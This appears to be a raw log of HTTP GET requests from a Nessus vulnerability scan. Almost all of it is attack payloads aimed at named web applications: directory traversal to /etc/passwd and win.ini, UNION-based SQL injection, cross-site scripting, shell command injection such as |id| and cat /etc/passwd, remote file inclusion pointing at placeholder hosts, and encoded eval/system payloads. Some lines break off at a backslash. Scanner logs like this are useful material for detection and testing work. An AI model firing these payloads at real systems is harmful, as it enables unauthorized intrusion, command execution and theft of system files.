GET /index.php?CID=' HTTP/1.1
GET /index.php?_language=../../../../../../../../../../etc/passwd%00 HTTP/1.1
GET /index.php?act=Arcade&do=stats&gameid=1' HTTP/1.1
GET /index.php?act=help&do=aboutOAT HTTP/1.1
GET /index.php?act=sm_window&page=event&day=-1%20UNION%20SELECT%201%2c1410938996%2c1464083933%20-- HTTP/1.1
GET /index.php?action=Login&module=Users HTTP/1.1
GET /index.php?action=login&languages[Nessus]=syscp_1211.nasl&language=Nessus&langs[Nessus][0][file]=/etc/passwd HTTP/1.1
GET /index.php?action=logout&sesc=1 HTTP/1.1
GET /index.php?action=view&filename=../../../../../../../../../../../../../etc/passwd HTTP/1.1
GET /index.php?action=view&module=resourcesmodule&id=0%20UNION%20SELECT%20-1%2c'exponent_0964.nasl'%2c'Nessus%20test'%2c'O%3a8%3a%22stdClass%22%3a3%3a%7bs%3a3%3a%22mod%22%3bs%3a15%3a%22resourcesmodule%22%3bs%3a3%3a%22src%22%3bs%3a20%3a%22%40random41940ceb78dbb%22%3bs%3a3%3a%22int%22%3bs%3a0%3a%22%22%3b%7d'%2c7%2c0%2c0%2c0%2c0%2c0%2c0%20-- HTTP/1.1
GET /index.php?album=../../../../../../../../../../etc/passwd%00 HTTP/1.1
GET /index.php?board=nonexistant1389102678 HTTP/1.1
GET /index.php?c=access&a=login&ref_c=nessus%22%3e%3cscript%3ealert(424716962)%3c%2fscript%3e&ref_a=projectpier_login_page_xss.nasl%22%3e%3cscript%3ealert(1460280210)%3c%2fscript%3e HTTP/1.1
GET /index.php?cat=' HTTP/1.1
GET /index.php?cat_select=<scr ipt>foo</script> HTTP/1.1
GET /index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc HTTP/1.1
GET /index.php?configFile=../../../../../../../../../etc/passwd HTTP/1.1
GET /index.php?do=ext&page=http://xxxxxxxx/file HTTP/1.1
GET /index.php?doc=http://xxxxxx./foo.php HTTP/1.1
GET /index.php?edit=nonexistant827335809 HTTP/1.1
GET /index.php?entry=' HTTP/1.1
GET /index.php?fields=CHAR(49,39,41,59,101,118,97,108,40,98,97,115,101,54,52,95,100,101,99,111,100,101,40,36,95,83,69,82,86,69,82,91,72,84,84,80,95,78,69,83,83,85,83,95,67,77,68,93,41,41,59,47,47),1 HTTP/1.1
GET /index.php?function=custom&custom=http://xxxxxxxx/1 HTTP/1.1
GET /index.php?gadget=../../../../../../etc/passwd%00&path=/etc HTTP/1.1
GET /index.php?gadget=Glossary&action=ViewTerm&term=%3cscript%3ealert('jaws_xss.nasl')%3b%3c%2fscript%3e HTTP/1.1
GET /index.php?gadget=Glossary&action=view&term=%3cscript%3ealert('jaws_xss.nasl')%3b%3c%2fscript%3e HTTP/1.1
GET /index.php?getApplication=register&checknum=1&args=null HTTP/1.1
GET /index.php?get_action=get_boot_conf HTTP/1.1
GET /index.php?go=detail&id=-99999/**/UNION/**/SELECT/**/0,1,concat(1410938905,0x3a,32428285),3,4,5,6,7,8,9,10,11,12,13,14,15,16 HTTP/1.1
GET /index.php?go=detail&id=-99999/**/UNION/**/SELECT/**/0,1,concat(1410938905,0x3a,32428285),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 HTTP/1.1
GET /index.php?id=' HTTP/1.1
GET /index.php?id='UNION/**/SELECT/**/0,0,775763340,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0-- HTTP/1.1
GET /index.php?id=m1ms48leva' HTTP/1.1
GET /index.php?inc=http://xxxxxx./foo HTTP/1.1
GET /index.php?include_files[]=&include_files[query_string]=/etc/passwd HTTP/1.1
GET /index.php?kietu[url_hit]=http://xxxxxxxx/ HTTP/1.1
GET /index.php?libDir=http://xxxxxxxx HTTP/1.1
GET /index.php?lng=../system_footer&sensor_program=phpsysinfo_241.nasl HTTP/1.1
GET /index.php?mod_id=2&kb_ask=%3c%2ftextarea%3e%3cscript%3ealert(%22cerberus_support_center_mult_flaws.nasl%22)%3c%2fscript%3e HTTP/1.1
GET /index.php?mode=administration HTTP/1.1
GET /index.php?module=<scr ipt>foo</script> HTTP/1.1
GET /index.php?module=Navigation HTTP/1.1
GET /index.php?module=Topics&func=view&topicid=-1%20UNION%20SELECT%20null%2cnull%2c'mdpro_topicid_sql_injection.nasl-1410938973'%2cnull%2cnull%2cnull%2cnull%20-- HTTP/1.1
GET /index.php?module=ew_filemanager&type=admin&func=manager HTTP/1.1
GET /index.php?name=Your%20Account&profile=anyone%22%3E%3Cscript%3Ealert('Nessus%20was%20here')%3B%3C%2Fscript%3E HTTP/1.1
GET /index.php?op=Default&Date=200607'%20UNION%20SELECT%201%2c274868473%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c1--&blogId=1 HTTP/1.1
GET /index.php?op=ViewAlbum&albumId=-1/**/UNION/**/SELECT/**/0,1,1594149138,434134926,1,1,1,1,1--&blogId=1 HTTP/1.1
GET /index.php?op=ViewArticle&articleId=9999%2f**%2fUNION%2f**%2fSELECT%2f**%2f1410938971%2c1%2c1%2c1%2c1%2c1%2c1%2c1--&blogId=1 HTTP/1.1
GET /index.php?op=disp&filedata=c3lzdGVtKCdpZCcpOw== HTTP/1.1
GET /index.php?option=frontpage&Itemid=2|system(id)|1410938942 HTTP/1.1
GET /index.php?option=weblinks&Itemid=2&catid=-1%20UNION%20SELECT%200%2c1%2c2%2c784673728725%2c4%2c5%2c6%2c7%2c8%2c9%2c10%2c11-- HTTP/1.1
GET /index.php?owa_do=base.loginForm HTTP/1.1
GET /index.php?p='nessus HTTP/1.1
GET /index.php?page=../../../../../../../../../../../../../../../../../WINNT/system32/ipconfig.exe HTTP/1.1
GET /index.php?page=../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
GET /index.php?page=/etc/passwd%00 HTTP/1.1
GET /index.php?page=documents&doc=-99%27%20UNION%20SELECT%20null,null,%27nessus%27,%27dcpportal_sql.nasl%27,null,null,null,null,null,null,null,null-- HTTP/1.1
GET /index.php?pingto=www.nessus.org%20|%20dir HTTP/1.1
GET /index.php?post=../config/password HTTP/1.1
GET /index.php?req_path=http://xxxxxx./ HTTP/1.1
GET /index.php?search=%3cscript%3ealert('cmsimple_search_xss.nasl')%3b%3c%2fscript%3e&function=search HTTP/1.1
GET /index.php?search='>%3Cscript%3Ealert('autoindex_search_xss.nasl')%3B%3C%2Fscript%3E&searchMode=f HTTP/1.1
GET /index.php?search=<scr ipt>foo</script> HTTP/1.1
GET /index.php?selskin=..%2Finc%2Fboxleft.inc%00&xposbox[L][]=%2Fetc%2Fpasswd%00 HTTP/1.1
GET /index.php?sensor_program=%3cscript%3ealert('phpsysinfo_multiple_xss.nasl')%3b%3c%2fscript%3e HTTP/1.1
GET /index.php?setLang=gcards_dir_transversal.nasl&lang[gcards_dir_transversal.nasl][file]=../../../../../../../../../../../../etc/passwd HTTP/1.1
GET /index.php?show=../../../../../../../../../../../etc/passwd%00 HTTP/1.1
GET /index.php?show=/etc/passwd HTTP/1.1
GET /index.php?site=../../../../../../../../etc/passwd%00 HTTP/1.1
GET /index.php?src=1&_common=1&time=1410938882&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd%00 HTTP/1.1
GET /index.php?string=' HTTP/1.1
GET /index.php?template=../../../loudblog/custom/config.php%00 HTTP/1.1
GET /index.php?templates_dir=/etc/passwd%00 HTTP/1.1
GET /index.php?user_langue=../../../../../../../../../../etc/passwd HTTP/1.1
GET /index.php?x=browse&category='UNION%20SELECT%20'1'%2c'2'%2c'pixelpost_category_sql_injection.nasl'%2c'1410938951'%2c'5'-- HTTP/1.1
GET /index.phtml HTTP/1.1
GET /index.phtml?mode=view&album=`id`&pic=A=10.jpg&dispsize=640&start=0 HTTP/1.1
GET /index.pl/homels?func=add;class=WebGUI::Asset::Wobject::Article%3bprint%20%60id%60; HTTP/1.1
GET /index2.cgi?frames=yes&board=demo&mode=Current&threads=Collapse&message=../../../../../../../../../../etc/passwd%00 HTTP/1.1
GET /index2.php?_SERVER[]=&_SERVER[REMOTE_ADDR]='.system('id').exit().'&option=wrapper&module[module]=1 HTTP/1.1
GET /info.dat HTTP/1.1
GET /info.php HTTP/1.1
GET /info/ HTTP/1.1
GET /info/refs?service=git-upload-pack HTTP/1.1
GET /info2www HTTP/1.1
GET /information/ HTTP/1.1
GET /infosrch.cgi?cmd=getdoc&db=man&fname=|/bin/id HTTP/1.1
GET /ingo/ HTTP/1.1
GET /ingresa/ HTTP/1.1
GET /ingreso/ HTTP/1.1
GET /input.bat?|type%20c:\\windows\\win.ini HTTP/1.1
GET /input.bat?|type%20c:\\winnt\\win.ini HTTP/1.1
GET /input2.bat?|type%20c:\\windows\\win.ini HTTP/1.1
GET /input2.bat?|type%20c:\\winnt\\win.ini HTTP/1.1
GET /insertorder.cfm?CFID=1&CFTOKEN=1%20UNION%20SELECT%201%2c2%2c3%2c4%2cstorename%2c6%2c7%2c8%2c9%2c10%2c11%2c12%2c13%2c14%2c15%20from%20Params%22having%201%3d1 HTTP/1.1
GET /instaboard/index.cfm?catid=1%20SQL HTTP/1.1
GET /install.php?newlang=../../cpg_error.log%00 HTTP/1.1
GET /install/ HTTP/1.1
GET /interchange/ HTTP/1.1
GET /interface/index.do HTTP/1.1
GET /internal/ HTTP/1.1
GET /interscan/cgi-bin/FtpSave.dll?I'm%20Here HTTP/1.1
GET /intl/ HTTP/1.1
GET /intranet/ HTTP/1.1
GET /intranet/browse.php HTTP/1.1
GET /introbuilder/ HTTP/1.1
GET /intruvert/jsp/admin/Login.jsp HTTP/1.1
GET /inventory/ HTTP/1.1
GET /invision/ HTTP/1.1
GET /invitado/ HTTP/1.1
GET /invoker/EJBInvokerServlet HTTP/1.1
GET /invoker/JMXInvokerServlet HTTP/1.1
GET /ion-p.exe?page=../../../../../etc/passwd HTTP/1.1
GET /ion-p.exe?page=c:\\\\winnt\\\\win.ini HTTP/1.1
GET /ipam/ HTTP/1.1
GET /ipb/ HTTP/1.1
GET /isapi/ HTTP/1.1
GET /item.fts?href=%22%3E%3Cscript%3Ealert(%22ftgate_44002.nasl%22)%3C%2Fscript%3E%3B HTTP/1.1
GET /ivc2/Backup/IVC1/html/index.htm HTTP/1.1
GET /ixmail/ HTTP/1.1
GET /ixmail/README.TXT HTTP/1.1
GET /jackrabbit/ HTTP/1.1
GET /jackrabbit/search.jsp?q=%25%22%3cscript%3ealert(1410938809)%3c/script%3e HTTP/1.1
GET /jammail.pl?job=showoldmail&mail=|id| HTTP/1.1
GET /japidoc/ HTTP/1.1
GET /java/ HTTP/1.1
GET /javascript.php?abs_path=/etc/passwd%00 HTTP/1.1
GET /javascript/ HTTP/1.1
GET /javasdk/ HTTP/1.1
GET /javatest/ HTTP/1.1
GET /jave/ HTTP/1.1
GET /jcart/ HTTP/1.1
GET /jdbc/ HTTP/1.1
GET /jffnms/ HTTP/1.1
GET /jgs_portal_statistik.php?meinaction=themen&month=1&year=1' HTTP/1.1
GET /jinzora/ HTTP/1.1
GET /jira/ HTTP/1.1
GET /job/ HTTP/1.1
GET /jobtracker.jsp HTTP/1.1
GET /joomla/ HTTP/1.1
GET /journal/ HTTP/1.1
GET /jretest.html HTTP/1.1
GET /jrun/ HTTP/1.1
GET /js/ HTTP/1.1
GET /js/hpsum/hpsum-version.js HTTP/1.1
GET /js/scripts.php?load=/etc/passwd%00 HTTP/1.1
GET /js/vendors.php?file=../../../../../../../../../../etc/passwd%00nessus.js HTTP/1.1
GET /js/zimbraMail/share/model/ZmSettings.js HTTP/1.1
GET /jserv/ HTTP/1.1
GET /jslib/ HTTP/1.1
GET /jsp-examples/ HTTP/1.1
GET /jsp/ HTTP/1.1
GET /jsp/index.html HTTP/1.1
GET /jukebox/ HTTP/1.1
GET /junk/ HTTP/1.1
GET /k/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor HTTP/1.1
GET /kayako/ HTTP/1.1
GET /kernel/loadkernel.php?installPath=/etc/passwd%00 HTTP/1.1
GET /keyserver/ HTTP/1.1
GET /kiva/ HTTP/1.1
GET /klan/ HTTP/1.1
GET /klan/index.php?file=News&op=phpinfo HTTP/1.1
GET /labs/ HTTP/1.1
GET /lampp/ HTTP/1.1
GET /landesk/vboot/default.winpemanaged HTTP/1.1
GET /lang/index.php?file=/etc/passwd HTTP/1.1
GET /lang/lang.php?lang_path=/etc/passwd%00 HTTP/1.1
GET /language.php?data_dir=/etc/passwd%00 HTTP/1.1
GET /lcds/messagebroker/http HTTP/1.1
GET /lcgi/ HTTP/1.1
GET /lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse HTTP/1.1
GET /lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/misc/test.jse HTTP/1.1
GET /lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/viewcode.jse+httplist+httplist/../../../../../system/autoexec.ncf HTTP/1.1
GET /ldap/cgi-bin/ldacgi.exe?Action=Substitute&Template=../../../../../boot.ini&Sub=LocalePath&LocalePath=enus1252 HTTP/1.1
GET /learned.html HTTP/1.1
GET /ledger-smb/ HTTP/1.1
GET /ledger/ HTTP/1.1
GET /ledgersmb/ HTTP/1.1
GET /legal/ HTTP/1.1
GET /lg.php HTTP/1.1
GET /lib.inc.php?pm_path=http://xxxxxxxx&sfx=.txt HTTP/1.1
GET /lib/ HTTP/1.1
GET /lib/OWL_API.php?xrms_file_root=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1
GET /lib/adodb/server.php?sql='adodb_sql_sql_injection.nasl HTTP/1.1
GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7b%7dsystem(id)%3bclass%20zZz_ADOConnection%7b%7d%2f%2f HTTP/1.1
GET /lib/authform.inc.php?path_pre=/etc/passwd%00 HTTP/1.1
GET /lib/dbman_filter.inc.php?lib_path=/etc/passwd%00 HTTP/1.1
GET /lib/version.phps HTTP/1.1
GET /libraries/ HTTP/1.1
GET /libraries/adodb/server.php?sql='adodb_sql_sql_injection.nasl HTTP/1.1
GET /library/ HTTP/1.1
GET /library/adodb/server.php?sql='adodb_sql_sql_injection.nasl HTTP/1.1
GET /library/lib.php?root=http://xxxxxxxxxxx HTTP/1.1
GET /libro/ HTTP/1.1
GET /lifetype/ HTTP/1.1
GET /limbo/ HTTP/1.1
GET /limesurvey/ HTTP/1.1
GET /links/ HTTP/1.1
GET /links_en.html HTTP/1.1
GET /linpha/ HTTP/1.1
GET /linux/ HTTP/1.1
GET /list.php HTTP/1.1
GET /listinfo/ HTTP/1.1
GET /listing.php HTTP/1.1
GET /listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc| HTTP/1.1
GET /lists/ HTTP/1.1
GET /lists/admin/ HTTP/1.1
GET /live/ HTTP/1.1
GET /livehelp/ HTTP/1.1
GET /livre_include.php?no_connect=lol&chem_absolu=http://xxxxxx./ HTTP/1.1
GET /loader-wizard.php?page=default HTTP/1.1
GET /loader/ HTTP/1.1
GET /loadpage.cgi HTTP/1.1
GET /local.html HTTP/1.1
GET /local/ HTTP/1.1
GET /log/ HTTP/1.1
GET /logbook.pl?file=../../../../../../../../../../bin/cat%20/etc/passwd%00| HTTP/1.1
GET /logfile/ HTTP/1.1
GET /logfiles/ HTTP/1.1
GET /logg/ HTTP/1.1
GET /logger/ HTTP/1.1
GET /logging/ HTTP/1.1
GET /logicworks.ini HTTP/1.1
GET /login HTTP/1.1
GET /login.action HTTP/1.1
GET /login.cgi HTTP/1.1
GET /login.cgi?username=&command=simple&do=edit&password=&file=|id| HTTP/1.1
GET /login.htm HTTP/1.1
GET /login.html HTTP/1.1
GET /login.html?1600 HTTP/1.1
GET /login.jsf HTTP/1.1
GET /login.jsp HTTP/1.1
GET /login.jsp?lang=en&cntry= HTTP/1.1
GET /login.mako HTTP/1.1
GET /login.php HTTP/1.1
GET /login.php?attempt=1&uname=%201410938634 HTTP/1.1
GET /login.php?course=\
GET /login.php?lang=/../../../../../../../../../../../../etc/passwd%00 HTTP/1.1
GET /login.php?lang=/../../../../../../../../../../../../etc/passwd%00.txt HTTP/1.1
GET /login.php?return=http://www.nessus.org/ HTTP/1.1
GET /login.php?url=editgedcoms.php HTTP/1.1
GET /login.php?user=\
GET /login.pl HTTP/1.1
GET /login.pl?login=ledgersmb_script_code_exec.nasl&script=-e%20print%20%22Content-Type%3a%20text%2fplain%0d%0a%0d%0a%22%3bsystem(id)&action=logout HTTP/1.1
GET /login.wdm HTTP/1.1
GET /login/ HTTP/1.1
GET /login/?user=|\
GET /login/login.html HTTP/1.1
GET /login1.htm HTTP/1.1
GET /login?redirects=10 HTTP/1.1
GET /login?user=**%3Cscript%3EJavaScript:alert('cpanel_login_user_xss.nasl')%3B%3C%2Fscript%3E HTTP/1.1
GET /login_page.php HTTP/1.1
GET /login_up.php3?login_name=x&passwd=x&locale_id=../../../../../../../../../../../../boot.ini%00.jpg HTTP/1.1
GET /logon/ HTTP/1.1
GET /logon?onok=%22%3e%3cscript%3ealert('axon_logon_xss.nasl')%3c%2fscript%3e HTTP/1.1
GET /logout HTTP/1.0
GET /logrover/ HTTP/1.1
GET /logs/ HTTP/1.1
GET /logs/HCDiskQuotaService.csv HTTP/1.1
GET /lost+found/ HTTP/1.1
GET /lostpass.php HTTP/1.1
GET /loudblog/ HTTP/1.1
GET /loudblog/inc/parse_old.php?template=@system(id);@&php_use=1&phpseparator=@ HTTP/1.1
GET /lp HTTP/1.1
GET /lp/AdminlogonPoint/Logon.do HTTP/1.1
GET /lsg2.cgi HTTP/1.1
GET /lua/pages/message/About.jsp HTTP/1.1
GET /maia/ HTTP/1.1
GET /mail.cgi HTTP/1.1
GET /mail.php?id='/**/UNION/**/SELECT/**/1,2,1410939002,4--&blog=1 HTTP/1.1
GET /mail/ HTTP/1.1
GET /mail/accounts/inc/include.php?language=0&lang_settings[0][1]=http://xxxxxxxxxxxxxxx/nessus/ HTTP/1.1
GET /mail/admin/ HTTP/1.1
GET /mail/inc/function.php HTTP/1.1
GET /mail/src/redirect.php HTTP/1.1
GET /mail_log_files/ HTTP/1.1
GET /mailbox.php3?actionID=6&server=x&imapuser=x';somesql&pass=x HTTP/1.1
GET /mailguard/ HTTP/1.1
GET /mailgust/ HTTP/1.1
GET /maillist/ HTTP/1.1
GET /mailman/ HTTP/1.1
GET /mailroot/ HTTP/1.1
GET /mailscanner/ HTTP/1.1
GET /mailserver/ HTTP/1.1
GET /mailwatch/ HTTP/1.1
GET /main.cgi?next_file=main.htm HTTP/1.1
GET /main.php HTTP/1.1
GET /main/inc/lib/ HTTP/1.1
GET /main_internet.php HTTP/1.1
GET /mainui/ HTTP/1.1
GET /makefile/ HTTP/1.1
GET /mall_log_files/ HTTP/1.1
GET /mambo/ HTTP/1.1
GET /man-cgi?-P%20id%20ls HTTP/1.1
GET /man-cgi?section=0&topic=ls%3bid HTTP/1.1
GET /man2html?section=-P%20id&topic=w HTTP/1.1
GET /man2web?program=-P%20id%20ls HTTP/1.1
GET /manage/ HTTP/1.1
GET /manage/login.vtl HTTP/1.1
GET /manager/ HTTP/1.1
GET /manager/html/ HTTP/1.1
GET /manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=/etc/passwd%00 HTTP/1.1
GET /mantis/ HTTP/1.1
GET /manual/ HTTP/1.1
GET /manual/ag/contents.htm HTTP/1.1
GET /manual/help/help?helpdir=../../setup/locale/resources&token=Frame-Title-Text&mapfile=DSSetupResources.properties&debug=1 HTTP/1.1
GET /map/sitemap.xml HTTP/1.1
GET /mapserv.exe?map=mapserver_detect.nasl.map HTTP/1.1
GET /mapserv?map=mapserver_detect.nasl.map HTTP/1.1
GET /marketing/ HTTP/1.1
GET /math_sum.mscgi HTTP/1.1
GET /mathtex.cgi?\\dvips\\dpi{150|id%20%3e%20%24(ps%20ax%20%7c%20fgrep%20%22mathtex_dpi_exec.nasl-1410938969%22%20%7c%20egrep%20%22%2f%5b0-9a-fA-F]%2b%5c.gif%22%20%7c%20tail%20-1%20%7c%20sed%20-n%20-e%20's%2f.*dvips.ps%20%2f%2f'%20-e%20's%2fgif%20%3econvert.*%2fgif%2fp'%20%7c%20tee%20%2ftmp%2ffoo4)%20%7c%20echo%20mathtex_dpi_exec.nasl-1410938969%20} HTTP/1.1
GET /mathtex.pl?\\dvips\\dpi{150|id%20%3e%20%24(ps%20ax%20%7c%20fgrep%20%22mathtex_dpi_exec.nasl-1410938969%22%20%7c%20egrep%20%22%2f%5b0-9a-fA-F]%2b%5c.gif%22%20%7c%20tail%20-1%20%7c%20sed%20-n%20-e%20's%2f.*dvips.ps%20%2f%2f'%20-e%20's%2fgif%20%3econvert.*%2fgif%2fp'%20%7c%20tee%20%2ftmp%2ffoo4)%20%7c%20echo%20mathtex_dpi_exec.nasl-1410938969%20} HTTP/1.1
GET /mdpro/ HTTP/1.1
GET /mediawiki/ HTTP/1.1
GET /member.php?action=login HTTP/1.1
GET /member/ HTTP/1.1
GET /member/index.php HTTP/1.1
GET /members/ HTTP/1.1
GET /mensajeitor.php HTTP/1.1
GET /menu.htm HTTP/1.1
GET /menu_dx.php?SITE_Path=../../../../../../../../../../etc/passwd%00 HTTP/1.1
GET /mercuryboard/ HTTP/1.1
GET /message/ HTTP/1.1
GET /messagebroker/http HTTP/1.1
GET /messaging/ HTTP/1.1
GET /metacart/ HTTP/1.1
GET /mini/ HTTP/1.1
GET /minibb/ HTTP/1.1
GET /minis.php?month=../../../../../../etc/passwd HTTP/1.1
GET /misc.php?action=login HTTP/1.1
GET /misc/ HTTP/1.1
GET /misc/audio.php?recording=../version.inc HTTP/1.1
GET /misc/info.php HTTP/1.1
GET /mj_wwwusr HTTP/1.1
GET /mkstats/ HTTP/1.1
GET /mlog.html?screen=/etc/passwd HTTP/1.1
GET /mmstdod.cgi?ALTERNATE_TEMPLATES=|%20echo%20\
GET /mnemo/ HTTP/1.1
GET /mod_gzip_status HTTP/1.1
GET /module.php?module=osTicket&file=../../../../../../../../../../../etc/passwd HTTP/1.1
GET /module.php?module=osTicket&file=/modules/osTicket/admin.php HTTP/1.1
GET /modules.php?mod=fm&file=../../../../../../../../../../etc/passwd%00&bn=fm_d1 HTTP/1.1
GET /modules.php?name=My_eGallery HTTP/1.1
GET /modules/Printing/output.php?url=Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== HTTP/1.1
GET /modules/TinyMCE/content_css.php?templateid=-1/**/UNION/**/SELECT/**/1410938975,1,409460379-- HTTP/1.1
GET /modules/core/module.inc HTTP/1.1
GET /modules/forum/ HTTP/1.1
GET /modules/jinzora/backend/classes.php?include_path=../lib/jinzora.js%00 HTTP/1.1
GET /modules/jinzora/index.php HTTP/1.1
GET /modules/jinzora/popup.php?include_path=/etc/passwd%00 HTTP/1.1
GET /modules/news/ HTTP/1.1
GET /modules/phpRPC/server.php HTTP/1.1
GET /modules/projects/sql/install-0.9.7.php?p=2 HTTP/1.1
GET /modx/ HTTP/1.1
GET /modx/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=/etc/passwd%00 HTTP/1.1
GET /moinmoin/ HTTP/1.1
GET /month.php HTTP/1.1
GET /moodle/ HTTP/1.1
GET /more.php?id=1' HTTP/1.1
GET /movimientos/ HTTP/1.1
GET /mp3/ HTTP/1.1
GET /mp3s/ HTTP/1.1
GET /mpweb/html/help/000/user_help/help/output/config.js HTTP/1.1
GET /mqseries/ HTTP/1.1
GET /mrbs/ HTTP/1.1
GET /mrtg.cgi?cfg=/../../../../../../../../../etc/passwd HTTP/1.1
GET /mrtg.cgi?cfg=/../../../../../../../../../winnt/win.ini HTTP/1.1
GET /msg.txt HTTP/1.1
GET /msql/ HTTP/1.1
GET /mt.cgi?__mode=logout HTTP/1.1
GET /mt/ HTTP/1.1
GET /mve/help/en/inventory/am_about.html HTTP/1.1
GET /mvnforum/ HTTP/1.1
GET /mw-config HTTP/1.1
GET /mw1axrs8.asp?<IMG%20SRC=\
GET /mw1axrs8.asp?<scr ipt>cross_site_scripting.nasl</script> HTTP/1.1
GET /mw1axrs8.aspx?<IMG%20SRC=\
GET /mw1axrs8.aspx?<scr ipt>cross_site_scripting.nasl</script> HTTP/1.1
GET /mw1axrs8.cfc?<IMG%20SRC=\
GET /mw1axrs8.cfc?<scr ipt>cross_site_scripting.nasl</script> HTTP/1.1
GET /mw1axrs8.cfm?<IMG%20SRC=\
GET /mw1axrs8.cfm?<scr ipt>cross_site_scripting.nasl</script> HTTP/1.1
GET /mw1axrs8.cgi?<IMG%20SRC=\
GET /mw1axrs8.cgi?<scr ipt>cross_site_scripting.nasl</script> HTTP/1.1
GET /mw1axrs8.dll?<IMG%20SRC=\
GET /mw1axrs8.dll?<scr ipt>cross_site_scripting.nasl</script> HTTP/1.1
GET /mw1axrs8.do?<IMG%20SRC=\
GET /mw1axrs8.do?<scr ipt>cross_site_scripting.nasl</script> HTTP/1.1
GET /mw1axrs8.exe?<IMG%20SRC=\
GET /mw1axrs8.exe?<scr ipt>cross_site_scripting.nasl</script> HTTP/1.1
GET /mw1axrs8.fts?<IMG%20SRC=\
GET /mw1axrs8.fts?<scr ipt>cross_site_scripting.nasl</script> HTTP/1.1
GET /mw1axrs8.htm?<IMG%20SRC=\
GET /mw1axrs8.htm?<scr ipt>cross_site_scripting.nasl</script> HTTP/1.1
GET /mw1axrs8.html?<IMG%20SRC=\
GET /mw1axrs8.html?<scr ipt>cross_site_scripting.nasl</script> HTTP/1.1
GET /mw1axrs8.idc?<IMG%20SRC=\
GET /mw1axrs8.idc?<scr ipt>cross_site_scripting.nasl</script> HTTP/1.1
GET /mw1axrs8.jsp?<IMG%20SRC=\
GET /mw1axrs8.jsp?<scr ipt>cross_site_scripting.nasl</script> HTTP/1.1
GET /mw1axrs8.jspa?<IMG%20SRC=\
GET /mw1axrs8.jspa?<scr ipt>cross_site_scripting.nasl</script> HTTP/1.1
GET /mw1axrs8.kspx?<IMG%20SRC=\
GET /mw1axrs8.kspx?<scr ipt>cross_site_scripting.nasl</script> HTTP/1.1
GET /mw1axrs8.mscgi?<IMG%20SRC=\
GET /mw1axrs8.mscgi?<scr ipt>cross_site_scripting.nasl</script> HTTP/1.1
GET /mw1axrs8.nsf?<IMG%20SRC=\
GET /mw1axrs8.nsf?<scr ipt>cross_site_scripting.nasl</script> HTTP/1.1
GET /mw1axrs8.php3?<IMG%20SRC=\
GET /mw1axrs8.php3?<scr ipt>cross_site_scripting.nasl</script> HTTP/1.1
GET /mw1axrs8.php?<IMG%20SRC=\
GET /mw1axrs8.php?<scr ipt>cross_site_scripting.nasl</script> HTTP/1.1
GET /mw1axrs8.pl?<IMG%20SRC=\
GET /mw1axrs8.pl?<scr ipt>cross_site_scripting.nasl</script> HTTP/1.1
GET /mw1axrs8.x?<IMG%20SRC=\
GET /mw1axrs8.x?<scr ipt>cross_site_scripting.nasl</script> HTTP/1.1
GET /mxhelp/cgi-bin/namazucgi?lang=/../../../../../../../../../../../../../boot.ini HTTP/1.1
GET /myaccount/ HTTP/1.1
GET /mybb/ HTTP/1.1
GET /myevent.php?myevent_path=/etc/passwd%00 HTTP/1.1
GET /mylog.html?screen=/etc/passwd HTTP/1.1
GET /myphpPageTool/doc/admin/index.php?ptinclude-http://xxxxxxxx HTTP/1.1
GET /myreview/ HTTP/1.1
GET /mysql/ HTTP/1.1
GET /mysql_admin/ HTTP/1.1
GET /nag/ HTTP/1.1
GET /nagiosfusion/login.php HTTP/1.1
GET /nagiosxi/login.php HTTP/1.1
GET /names.nsf/view?ReadDesign HTTP/1.1
GET /nbmember.cgi?cmd=test HTTP/1.1
GET /ncadmin/ HTTP/1.1
GET /ncbook.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10 HTTP/1.1
GET /ncbook/ncbook.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10 HTTP/1.1
GET /nchelp/ HTTP/1.1
GET /ncsample/ HTTP/1.1
GET /neomail-prefs.pl?sessionid=nessus-session-0.neomail_sessionid_validation.nasl&action=addfolder&foldername=JWb5YzwrZHPLwv92s HTTP/1.1
GET /neomail.pl HTTP/1.1
GET /nessus%22%3e%3cscript%3ealert('django_admin_xss.nasl')%3c%2fscript%3e%2f HTTP/1.1
GET /nessus345678.html HTTP/1.1
GET /nessus\\..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1
GET /nessus\\..\\..\\..\\..\\..\\..\\winnt\\win.ini HTTP/1.1
GET /netauth.cgi?cmd=show&page=../../../../../../../../../etc/passwd HTTP/1.1
GET /netbasic/ HTTP/1.1
GET /netbasic/websinfo.bas HTTP/1.1
GET /netcat/ HTTP/1.1
GET /netmagstats/ HTTP/1.1
GET /netmri/config/userAdmin/login.tdf HTTP/1.1
GET /netoffice/ HTTP/1.1
GET /netofficedwins/ HTTP/1.1
GET /netscape/ HTTP/1.1
GET /netshare/ HTTP/1.1
GET /nettracker/ HTTP/1.1
GET /new-visitor.inc.php?lvc_include_dir=http://xxxxxxxx HTTP/1.1
GET /new/ HTTP/1.1
GET /new_images.php?order=linpha_order_sql_injection.nasl_1410939024 HTTP/1.1
GET /news.mdb HTTP/1.1
GET /news.php HTTP/1.1
GET /news.php?prevnext=1'phpnews_prevnext_sql_injection.nasl HTTP/1.1
GET /news/ HTTP/1.1
GET /news/index.dot?id=../../../../../../../../../../../..//etc/passwd%00.jpg HTTP/1.1
GET /news/p-news.php HTTP/1.1
GET /newsdata/data/user.idx HTTP/1.1
GET /newsdesk.cgi?t=../../../../../../etc/passwd HTTP/1.1
GET /newsfeeds/ HTTP/1.1
GET /newsscript.pl?mode=admin HTTP/1.1
GET /newuser HTTP/1.1
